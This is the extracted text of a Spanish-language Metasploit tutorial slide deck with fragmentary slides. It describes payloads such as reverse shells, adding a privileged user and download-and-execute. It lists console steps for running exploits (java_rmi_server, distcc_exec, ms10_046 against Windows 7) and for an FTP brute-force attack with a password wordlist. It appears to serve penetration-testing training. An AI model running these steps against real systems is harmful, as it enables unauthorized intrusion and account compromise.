Académique Documents
Professionnel Documents
Culture Documents
MetaSploit
Conceptos basicos:
1
MetaSploit
explicare los mas comunes.
win32_adduser: agregara un usuario(con permisos elevados) al
sistema que nos penetremos
win32_bind_vncinject: nos mostrara la pantalla del usuario con la
cual podemos manejar y controlar su equipo remotamente (un VNC).
win32_downloadexec: Descargara un archivo de algun servidor web
o ftp y lo ejecutara(entre ellos puede estar troyanos ).
win32_exec: Ejecutara un comando especificado por ti en la variable
CMD.
win32_reverse: Mi favorita. Nos dar una shell inversa por si tiene
firewall y no podemos abrir puertos.
win32_reverse_vncinject:Nos dar un VNC inverso por si tiene
firewall y no podemos abrir puertos.
MetaSploit
recomiendo que solo rellenen las variables que digan required ya que
las
opcionales son para opciones mas avanzadas, aqu solo nos esta pidiendo
RHOST (host que atacaremos) y RPORT (puerto por el que se conectara),
nos puede pedir mas LHOST y LPORT (para conexiones inversas son el
host y el puerto que estar esperando la conexin para dar darle ordenes
en este caso tu IP y un puerto disponible de tu maquina), las dems
opciones las puedes llenar intuitivamente dependiendo del
exploit, ataque y etc que seleccionaste, para ir rellenando casa variable:
set [Variable] [Valor]
set RHOST IPVIctima
set RPORT PuertoDeLaVictima
en este caso RPORT tiene un valor por defaul como se ve en la imagen
(135) este no lo cambien a menos que sea necesario (que la victima tenga
el servicio en otro puerto).Una vez rellenadas todas las variables, solo
queda poner el comando:
exploit
Audit | Tax | Advisory 4
2
MetaSploit
Resumen:
MetaSploit
Ejemplo:
3
Explotando java
Tarea:
Lanzar exploit java_rmi_server contra servidor linux
4
Exploits:
Tarea:
Lanzar exploit distcc_exec contra el mismo IP
10
5
Usando John
11
12
6
Hacking Windows 7
Demostracion
exploit/windows/browser/ms10_046_shortcut_icon_dllloader
exploit
13
14
7
Ataque fuerza bruta servicio FTP
Resolucin:
1.En MSF use auxiliary/scanner/ftp/ftp_login
2.set RHOSTS ip_servidor_ftp
3.set PASS_FILE /pentest/passwords/wordlists/rockyou.txt
4.set USER_FILE /pentest/passwords/wordlists/users.txt
5.Run
15
16
8
Explotacion!
El commando show payload nos permite verlos diferentes payloads que le
podemos enviar con el exploit, MSF mostrara solo los payloads compatibles
con el exploit.
17
18
9
Audit | Tax | Advisory 19
19
20
10
Audit | Tax | Advisory 21
21
22
11
Crear un payload
Usar exploit/multi/handler
23
SET
24
12